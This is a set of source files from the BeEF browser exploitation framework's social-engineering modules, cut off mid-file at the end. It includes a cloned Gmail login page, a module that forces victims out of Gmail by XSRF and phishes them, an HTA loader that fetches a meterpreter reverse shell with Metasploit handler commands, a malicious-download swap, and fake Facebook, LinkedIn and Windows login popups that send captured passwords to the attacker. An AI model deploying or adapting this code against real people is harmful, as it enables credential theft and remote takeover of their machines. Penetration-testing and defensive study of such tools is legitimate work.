rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1); } .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb:horizontal { -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1); box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1); } .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb:hover { background-color: rgba(255,255,255,.6); -webkit-box-shadow: inset 1px 1px 1px rgba(255,255,255,.37); box-shadow: inset 1px 1px 1px rgba(255,255,255,.37); } .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb:active { background-color: rgba(255,255,255,.75); -webkit-box-shadow: inset 1px 1px 3px rgba(255,255,255,.5); box-shadow: inset 1px 1px 3px rgba(255,255,255,.5); } .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-track { border-width: 0 1px 0 6px; } .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-track:horizontal { border-width: 6px 0 1px; } .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-track:hover { background-color: rgba(0,0,0,.035); -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07); box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07); } .jfk-scrollbar-borderless.jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:hover { background-color: rgba(255,255,255,.07); -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15); box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15); } .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-thumb { border-width: 0 1px 0 6px; } .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-thumb:horizontal { border-width: 6px 0 1px; } .jfk-scrollbar::-webkit-scrollbar-corner { background: transparent; } body.jfk-scrollbar::-webkit-scrollbar-track-piece { background-clip: padding-box; background-color: #f1f1f1; border: solid #fff; border-width: 0 0 0 3px; -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07); box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07); } body.jfk-scrollbar::-webkit-scrollbar-track-piece:horizontal { border-width: 3px 0 0; -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07); box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07); } body.jfk-scrollbar::-webkit-scrollbar-thumb { border-width: 1px 1px 1px 5px; } body.jfk-scrollbar::-webkit-scrollbar-thumb:horizontal { border-width: 5px 1px 1px; } body.jfk-scrollbar::-webkit-scrollbar-corner { background-clip: padding-box; background-color: #f1f1f1; border: solid #fff; border-width: 3px 0 0 3px; -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14); box-shadow: inset 1px 1px 0 rgba(0,0,0,.14); } .errormsg { margin: .5em 0 0; display: block; color: #dd4b39; line-height: 17px; } .help-link { background: #dd4b39; padding: 0 5px; color: #fff; font-weight: bold; display: inline-block; -webkit-border-radius: 1em; -moz-border-radius: 1em; border-radius: 1em; text-decoration: none; position: relative; top: 0px; } .help-link:visited { color: #fff; } .help-link:hover { color: #fff; background: #c03523; text-decoration: none; } .help-link:active { opacity: 1; background: #ae2817; } </style> <style type='text/css'> .main { width: auto; max-width: 1000px; min-width: 780px; } .product-info { margin: 0 385px 0 0; } .product-info h3 { font-size: 1.23em; font-weight: normal; } .product-info a:visited { color: #61c; } .product-info .g-button:visited { color: #666; } .sign-in { width: 335px; float: right; } .signin-box, .accountchooser-box { margin: 12px 0 0; padding: 20px 25px 15px; background: #f1f1f1; border: 1px solid #e5e5e5; } .product-headers { margin: 0 0 1.5em; } .product-headers h1 { font-size: 25px; margin: 0 !important; } .product-headers h2 { font-size: 16px; margin: .4em 0 0; } .features { overflow: hidden; margin: 2em 0 0; } .features li { margin: 3px 0 2em; } .features img { float: left; margin: -3px 0 0; } .features p { margin: 0 0 0 68px; } .features .title { font-size: 16px; margin-bottom: .3em; } .features.no-icon p { margin: 0; } .features .small-title { font-size: 1em; font-weight: bold; } .notification-bar { background: #f9edbe; padding: 8px; } </style> <style type='text/css'> .signin-box h2 { font-size: 16px; line-height: 17px; height: 16px; margin: 0 0 1.2em; position: relative; } .signin-box h2 strong { display: inline-block; position: absolute; right: 0; top: 1px; height: 19px; width: 52px; } .signin-box div { margin: 0 0 1.5em; } .signin-box label { display: block; } .signin-box input[type=text], .signin-box input[type=password] { width: 100%; height: 32px; font-size: 15px; direction: ltr; } .signin-box .email-label, .signin-box .passwd-label { font-weight: bold; margin: 0 0 .5em; display: block; -webkit-user-select: none; -moz-user-select: none; user-select: none; } .signin-box .reauth { display: inline-block; font-size: 15px; height: 29px; line-height: 29px; margin: 0; } .signin-box label.remember { display: inline-block; vertical-align: top; margin: 9px 0 0; } .signin-box .remember-label { font-weight: normal; color: #666; line-height: 0; padding: 0 0 0 .4em; -webkit-user-select: none; -moz-user-select: none; user-select: none; } .signin-box input[type=submit] { margin: 0 1.5em 1.2em 0; height: 32px; font-size: 13px; } .signin-box ul { margin: 0; } .signin-box .training-msg { padding: .5em 8px; background: #f9edbe; } .signin-box .training-msg p { margin: 0 0 .5em; } </style> <style type='text/css'> .mail .mailPromo { border: 1px solid #ebebeb; margin-top: 25px; padding: 10px 10px 0px 10px; } .mail .mailPromoIcon { float: left; padding-bottom: 10px; padding-right: 9px; } .mail .mailPromoNew { color: red; } .mail .mailPromoIconLarge { float: left; padding-bottom: 10px; padding-right: 9px; margin-top: 0px; } .mail .mailPromoHead { padding-top: 7px; padding-bottom: 0; margin-bottom: 5px; } .mail .mailPromoBody { padding-top: 4px; margin-bottom: 10px; } .mail ul.mail-links { list-style: none; margin: 0; overflow: hidden; } .mail ul.mail-links li { float: left; margin: 0 20px 0 0; } </style> <link rel='publisher' href='https://plus.google.com/103345707817934461425' /> </head> <body> <div class='wrapper'> <div class='google-header-bar'> <div class='header content clearfix'> <img class='logo' src='https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_116x41dp.png' alt='Google'> <span class='signup-button'> New to Google Mail? <a id='link-signup' class='g-button g-button-red' href='https://accounts.google.com/SignUp?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dmm&amp;ltmpl=googlemail'> Create an account </a> </span> </div> </div> <div class='main content clearfix'> <div class='sign-in'> <div class='signin-box'> <h2>Sign in <strong></strong></h2> <form id='gaia_loginform' action='javascript:void(0);' method='post'> <input type='hidden' name='continue' id='continue' value='https://mail.google.com/mail/?tab=mm' > <input type='hidden' name='service' id='service' value='mail' > <input type='hidden' name='rm' id='rm' value='false' > <input type='hidden' name='dsh' id='dsh' value='-2663017759600220251' > <input type='hidden' name='ltmpl' id='ltmpl' value='googlemail' > <input type='hidden' name='scc' id='scc' value='1' > <input type='hidden' name='GALX' value='FVvSTtLIZzE'> <input type='hidden' id='pstMsg' name='pstMsg' value='0'> <input type='hidden' id='dnConn' name='dnConn' value=''> <input type='hidden' id='checkConnection' name='checkConnection' value=''> <input type='hidden' id='checkedDomains' name='checkedDomains' value='youtube'> <input type='hidden' name='timeStmp' id='timeStmp' value=''/> <input type='hidden' name='secTok' id='secTok' value=''/> <div class='email-div'> <label for='Email'><strong class='email-label'>Username</strong></label> <input type='text' spellcheck='false' name='Email' id='Email' value='' > </div> <div class='passwd-div'> <label for='Passwd'><strong class='passwd-label'>Password</strong></label> <input type='password' name='Passwd' id='Passwd' > </div> <input type='submit' class='g-button g-button-submit' name='signIn' id='signIn' onclick='clickedSubmitButton()' value='Sign in'> <label class='remember' onclick=''> <input type='checkbox' name='PersistentCookie' id='PersistentCookie' value='yes' > <strong class='remember-label'> Stay signed in </strong> </label> <input type='hidden' name='rmShown' value='1'> </form> <ul> <li> <a id='link-forgot-passwd' href='https://accounts.google.com/RecoverAccount?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dmm' target='_top'> Can&#39;t access your account? </a> </li> </ul> </div> </div> <div class='product-info mail'> <div class='product-headers'> <h1 class='redtext'>Google Mail</h1> <h2>A Google approach to email.</h2> </div> <p> Google Mail is built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Google Mail has: </p> <ul class='features'> <li> <img src='https://ssl.gstatic.com/images/icons/feature/filing_cabinet-g42.png' alt=''> <p class='title'>Lots of space</p> <p> Over <span id=quota>2757.272164</span> megabytes (and counting) of free storage. </p> </li> <li> <img src='https://ssl.gstatic.com/images/icons/feature/nosign-r42.png' alt=''> <p class='title'>Less spam</p> <p>Keep unwanted messages out of your inbox.</p> </li> <li> <img src='https://ssl.gstatic.com/images/icons/feature/mobile_phone-42.gif' alt=''> <p class='title'>Mobile access</p> <p>Get Google Mail on your mobile phone. <a href='http://www.google.com/intl/en_DE/mobile/mail/#utm_source=en_DE-cpp-g4mc-gmhp&utm_medium=cpp&utm_campaign=en_DE'>Learn more</a></p> </li> </ul> <ul class='mail-links'> <li><a href='http://mail.google.com/mail/help/intl/en/about.html' onclick='_gaq.push(['_link', 'http://mail.google.com/mail/help/intl/en/about.html', 'true']); return false;'> About Google Mail</a></li> <li><a href='http://mail.google.com/mail/help/intl/en/about_whatsnew.html' onclick='_gaq.push(['_link', 'http://mail.google.com/mail/help/about_whatsnew.html', 'true']); return false;'>New features!</a></li> <li><a href='http://mail.google.com/mail/help/intl/en/switch.html' onclick='_gaq.push(['_link', 'http://mail.google.com/mail/help/intl/en/switch.html', 'true']); return false;'>Switch to Google Mail</a></li> <li> <a href='https://accounts.google.com/SignUp?service=mail&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dmm&ltmpl=googlemail'> Create an account </a> </li> </ul> <div class='mailPromo'> <img src='https://ssl.gstatic.com/images/icons/product/apps-64.png' class='mailPromoIcon'> <h4>Take Google Mail to work with Google Apps for Business</h4> <p class='mailPromoBody'>Love Google Mail, but looking for a custom email address for your company?<br> Get business email, calendar, and online docs @your_company.com. <a href='http://www.google.com/apps/intl/en/business/gmail.html#utm_campaign=en&amp;utm_source=gmail_en_US&amp;utm_medium=et&amp;utm_term=login_promo'> Learn more</a></p> </div> </div> <div id='cc_iframe_parent'></div> </div> <div class='google-footer-bar'> <div class='footer content clearfix'> <ul> <li>© 2016 Google</li> <li><a href='http://www.google.com/apps/intl/en/business/gmail.html#utm_medium=et&utm_source=gmail-signin-en&utm_campaign=crossnav' target='_blank'>Google Mail for Work</a></li> <li><a href='http://mail.google.com/mail/help/intl/en/terms.html' target='_blank'>Terms &amp; Privacy</a></li> <li><a href='http://mail.google.com/support/?hl=en' target='_blank'>Help</a></li> </ul> <form> <select id='lang-chooser' class='lang-chooser' style='display: none;'> <option value='ms' > Bahasa Malaysia </option> <option value='ca' > Català </option> <option value='cy' > Cymraeg </option> <option value='da' > Dansk </option> <option value='de' > Deutsch </option> <option value='en' selected='selected' > English </option> <option value='en-GB' > English (UK) </option> <option value='es' > Español </option> <option value='es-419' > Español de Latinoamérica </option> <option value='eu' > Euskara </option> <option value='fil' > Filipino </option> <option value='fr' > Français </option> <option value='hr' > Hrvatski </option> <option value='in' > Indonesia </option> <option value='it' > Italiano </option> <option value='sw' > Kiswahili </option> <option value='lv' > Latviešu valoda </option> <option value='lt' > Lietuvių </option> <option value='nl' > Nederlands </option> <option value='no' > Norsk </option> <option value='pt-BR' > Português (Brasil) </option> <option value='pt-PT' > Português (Portugal) </option> <option value='ro' > Română </option> <option value='sk' > Slovenčina </option> <option value='sl' > Slovenščina </option> <option value='sv' > Svenska </option> <option value='tl' > Tagalog </option> <option value='vi' > Tiếng Việt </option> <option value='tr' > Türkçe </option> <option value='et' > eesti keel </option> <option value='hu' > magyar </option> <option value='pl' > polski </option> <option value='fi' > suomi </option> <option value='is' > íslenska </option> <option value='cs' > čeština </option> <option value='el' > Ελληνικά </option> <option value='ru' > Русский </option> <option value='uk' > Українська </option> <option value='bg' > български </option> <option value='sr' > српски </option> <option value='iw' > עברית </option> <option value='ur' > اردو </option> <option value='ar' > العربية </option> <option value='fa' > فارسی </option> <option value='mr' > मराठी </option> <option value='hi' > हिंदी </option> <option value='bn' > বাংলা </option> <option value='gu' > ગુજરાતી </option> <option value='ta' > தமிழ் </option> <option value='te' > తెలుగు </option> <option value='kn' > ಕನ್ನಡ </option> <option value='ml' > മലയാളം </option> <option value='th' > ไทย </option> <option value='am' > አማርኛ </option> <option value='zh-TW' > 中文 (繁體) </option> <option value='zh-CN' > 中文(简体) </option> <option value='ja' > 日本語 </option> <option value='ko' > 한국어 </option> </select> </form> </div> </div> </div> </body> </html> "; }
YAML
beef/modules/social_engineering/gmail_phishing/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: gmail_phishing: enable: true category: "Social Engineering" name: "Google Phishing" description: "This plugin uses an image tag to XSRF the logout button of Gmail. Continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (although the URL is NOT the Gmail URL)." authors: ["floyd @floyd_ch floyd.ch"] target: user_notify: ['ALL']
Ruby
beef/modules/social_engineering/gmail_phishing/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Gmail_phishing < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto beef_host = @configuration.beef_host beef_port = @configuration.beef_port base_host = "#{proto}://#{beef_host}:#{beef_port}" xss_hook_url = "#{base_host}/demos/plain.html" logout_gmail_interval = 10_000 wait_seconds_before_redirect = 1000 [ { 'name' => 'xss_hook_url', 'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, ' \ 'simply leave this field empty, but this means you will loose the hooked browser after executing this module.', 'ui_label' => 'XSS hook URI', 'value' => xss_hook_url, 'width' => '300px' }, { 'name' => 'logout_gmail_interval', 'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.', 'ui_label' => 'Gmail logout interval (ms)', 'value' => logout_gmail_interval, 'width' => '100px' }, { 'name' => 'wait_seconds_before_redirect', 'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) ' \ 'before we redirect to the real Gmail page, so that BeEF gets the credentials in time.', 'ui_label' => 'Redirect delay (ms)', 'value' => wait_seconds_before_redirect, 'width' => '100px' } ] end def post_execute content = {} content['Result'] = @datastore['result'] save content end end
JavaScript
beef/modules/social_engineering/hta_powershell/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function(){ var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta'; if (beef.browser.isIE()) { // application='yes' is IE-only and needed to load the HTA into an IFrame. // in this way you can have your phishing page, and load the HTA on top of it beef.dom.createIframe('hidden', {'src': hta_url, 'application': 'yes'}); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'HTA loaded into hidden IFrame.'); } });
YAML
beef/modules/social_engineering/hta_powershell/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: hta_powershell: enable: true category: ["Social Engineering"] name: "HTA PowerShell" description: "Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into an hidden IFrame.<br> If the user allows execution, powershell is used to download the payload (by @mattifestation) from BeEF.<br><br> The default payload is windows/meterpreter/reverse_https, and the attack works on both x86 and x86_64 targets.<br><br>Before launching the module, do the following on Metasploit:<br>use exploit/multi/handler<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z" authors: ["antisnatchor"] target: user_notify: ["IE"] not_working: ["ALL"]
Ruby
beef/modules/social_engineering/hta_powershell/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Hta_powershell < BeEF::Core::Command def self.options @config = BeEF::Core::Configuration.instance ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url') [ { 'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => @config.beef_url_str }, { 'name' => 'ps_url', 'ui_label' => 'Powershell/HTA handler', 'value' => ps_url } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/social_engineering/lcamtuf_download/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var maliciousurl = '<%= @malicious_file_uri %>'; var realurl = '<%= @real_file_uri %>'; var w; var once = '<%= @do_once %>'; function doit() { if (!beef.browser.isIE()) { w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=' + realurl + '">', 'foo'); setTimeout(donext, 4500); } } function donext() { window.open(maliciousurl, 'foo'); if (once != true) setTimeout(donext, 5000); once = true; } doit(); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed"); });
YAML
beef/modules/social_engineering/lcamtuf_download/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: lcamtuf_download: enable: true category: "Social Engineering" name: "Lcamtuf Download" description: "This module will attempt to execute a lcamtuf download. The file will be served with an alternative <i>Content-Disposition: attachment</i> header. For more information please refer to <a href='http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html'>http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html</a> ." authors: ["Bart Leppens"] target: user_notify: ["FF", "C"] not_working: ["IE", "O"]
Ruby
beef/modules/social_engineering/lcamtuf_download/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Lcamtuf_download < BeEF::Core::Command # set and return all options for this module def self.options [{ 'name' => 'real_file_uri', 'description' => 'The web accessible URI for the real file.', 'ui_label' => 'Real File Path', 'value' => 'http://get.adobe.com/flashplayer/', 'width' => '300px' }, { 'name' => 'malicious_file_uri', 'description' => 'The web accessible URI for the malicious file.', 'ui_label' => 'Malicious File Path', 'value' => '', 'width' => '300px' }, { 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore', 'store_fields' => ['do_once'], 'store_data' => [['false'], ['true']], 'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true }] end def post_execute content = {} content['result'] = @datastore['result'] save content end end
JavaScript
beef/modules/social_engineering/pretty_theft/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { imgr = "<%== @imgsauce %>"; var answer= ''; // set up darkening function grayOut(vis, options) { // Pass true to gray out screen, false to ungray // options are optional. This is a JSON object with the following (optional) properties // opacity:0-100 // Lower number = less grayout higher = more of a blackout // zindex: # // HTML elements with a higher zindex appear on top of the gray out // bgcolor: (#xxxxxx) // Standard RGB Hex color code // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'}); // Because options is JSON opacity/zindex/bgcolor are all optional and can appear // in any order. Pass only the properties you need to set. var options = options || {}; var zindex = options.zindex || 50; var opacity = options.opacity || 70; var opaque = (opacity / 100); var bgcolor = options.bgcolor || '#000000'; var dark=document.getElementById('darkenScreenObject'); if (!dark) { // The dark layer doesn't exist, it's never been created. So we'll // create it here and apply some basic styles. // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917 var tbody = document.getElementsByTagName("body")[0]; var tnode = document.createElement('div'); // Create the layer. tnode.style.position='absolute'; // Position absolutely tnode.style.top='0px'; // In the top tnode.style.left='0px'; // Left corner of the page tnode.style.overflow='hidden'; // Try to avoid making scroll bars tnode.style.display='none'; // Start out Hidden tnode.id='darkenScreenObject'; // Name it so we can find it later tbody.appendChild(tnode); // Add it to the web page dark=document.getElementById('darkenScreenObject'); // Get the object. } if (vis) { // Calculate the page width and height //if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) { // var pageWidth = document.body.scrollWidth+'px'; // var pageHeight = document.body.scrollHeight+'px'; //} else if( document.body.offsetWidth ) { // var pageWidth = document.body.offsetWidth+'px'; // var pageHeight = document.body.offsetHeight+'px'; //} else { // Previous lines were not rendering page background correctly var pageWidth='100%'; var pageHeight='100%'; //} //set the shader to cover the entire page and make it visible. dark.style.opacity=opaque; dark.style.MozOpacity=opaque; dark.style.filter='alpha(opacity='+opacity+')'; dark.style.zIndex=zindex; dark.style.backgroundColor=bgcolor; dark.style.width= pageWidth; dark.style.height= pageHeight; dark.style.display='block'; } else { dark.style.display='none'; } } // CURRENTLY NOT USED // Send done prompt to user function win(){ document.getElementById('popup').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>'; answer = document.getElementById('uname').value+':'+document.getElementById('pass').value; } // Check whether the user has entered a user/pass and pressed ok function checker(){ uname1 = document.getElementById("uname").value; pass1 = document.getElementById("pass").value; valcheck = document.getElementById("buttonpress").value; if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") { // Join user/pass and send to attacker answer = uname1+":"+pass1 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer); // Set lastchild invisible document.body.lastChild.setAttribute('style','display:none'); clearInterval(credgrabber); // Lighten screen grayOut(false); $j('#popup').remove(); $j('#darkenScreenObject').remove(); } else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true") { // If user has not entered any data, reset button document.getElementById("buttonpress").value = "false"; alert("Please enter a valid username and password."); } } // Facebook floating div function facebook() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'popup'); sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); document.body.appendChild(sneakydiv); // Set appearance using styles, maybe cleaner way to do this with CSS block? var windowborder = 'style="width:330px;background:white;border:10px #999999 solid;border-radius:8px"'; var windowmain = 'style="border:1px #555 solid;"'; var tbarstyle = 'style="color: rgb(255, 255, 255); background-color: rgb(109, 132, 180);font-size: 13px;font-family:tahoma,verdana,arial,sans-serif;font-weight: bold;padding: 5px;padding-left:8px;text-align: left;height: 30px;"'; var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; var messagestyle = 'style="align:left;font-size:11px;font-family:tahoma,verdana,arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; var box_prestyle = 'style="color: grey;font-size: 11px;font-weight: bold;font-family: tahoma,verdana,arial,sans-serif;padding-left:30px;"'; var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color: rgb(109,132,180);"'; var buttonstyle = 'style="font-size: 13px;background:#627aac;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; var title = 'Facebook Session Timed Out'; var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.'; var buttonLabel = '<input type="button" name="ok" value="Log in" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>'; // Build page including styles sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Email: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>'; // Repeatedly check if button has been pressed credgrabber = setInterval(checker,1000); } // Linkedin floating div function linkedin() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'popup'); sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); document.body.appendChild(sneakydiv); // Set appearance using styles, maybe cleaner way to do this with CSS block? var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"'; var windowmain = 'style="border:1px #555 solid;"'; var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 30px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"'; //-moz-box-shadow: 0 1px 4px #ccc;-webkit-box-shadow: 0 1px 4px #CCC;-o-box-shadow: 0 1px 4px #ccc;box-shadow: 0 1px 4px #CCC; var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"'; var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"'; var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; var lilogo = 'https://static.licdn.com/sc/h/95o6rrc5ws6mlw6wqzy0xgj7y'; var title = 'Session Timed Out <img src="' + lilogo + '" align=right height=20 width=70 alt="LinkedIn">'; var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.'; var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>'; // Build page including styles sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Email: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>'; // Repeatedly check if button has been pressed credgrabber = setInterval(checker,1000); } // Windows floating div function windows() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'popup'); sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:#ffffff;border-radius:6px;'); document.body.appendChild(sneakydiv); // Set appearance using styles, maybe cleaner way to do this with CSS block? // Set window border var edgeborder = 'style="border:1px #000000 solid;border-radius:6px;"'; var windowborder = 'style="width:400px;border: 7px #CFE7FE solid;border-radius:6px;"'; var windowmain = 'style="border:1px #000000 solid;"'; var titlebarstyle = 'style="background:#CFE7FE;height:19px;font-size:12px;font-family:Segoe UI;"'; var titlebartext = 'Windows Security'; var promptstyle = 'style="height:40px;"'; var titlestyle = 'style="align:left;font-size:14px;font-family:Segoe UI;margin:10px 15px;line-height:100%;color:0042CE;"'; var title = 'Enter Network Password'; var bodystyle = 'style="align:left;font-size:11px;font-family:Segoe UI;margin:10px 15px;line-height:170%;"'; var body = 'Enter your password to connect to the server'; var dividestyle = 'style="border-bottom:1px solid #DFDFDF;height:1px;width:92%;margin-left:auto;margin-right:auto;"'; var tablestyle = 'style="background:#CFE7FE;width:90%;margin-left:auto;margin-right:auto;border:1px solid #84ACDD;border-radius:6px;height:87px"'; var logobox = 'style="border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff"'; var logo = 'style="border:1px #000000 